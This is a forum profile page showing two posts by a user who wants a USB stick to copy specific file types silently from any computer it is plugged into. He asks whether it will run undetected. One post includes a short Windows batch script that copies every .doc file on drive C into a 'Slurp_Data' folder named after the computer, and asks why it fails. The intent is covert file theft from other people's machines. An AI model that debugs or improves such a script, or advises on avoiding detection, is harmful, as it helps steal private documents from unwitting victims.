Jump to content

Senior Juan

Members
  • Posts

    3
  • Joined

  • Last visited

Posts posted by Senior Juan

  1. This code should search C,find .doc files and copy them to the specified directory,what is the mistake ?

    :: Desktop files
    mkdir ..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\
    xcopy "C:\*.doc" "..\..\Documents\logfiles\%computername%\Slurp_Data\Desktop\" /s /c /q /r /h /y

  2. Hey guys,these usb hacks are awsome.I have a simple task that i want to perform,I just want when i insert my usb stick to a computer,to search for specific type of files in the computer's hard drive and copy them to the usb,just that.Is something like this possible ? This kind of task will run udetected or will it trigger an alarm ? Thanks in advance.

×
×
  • Create New...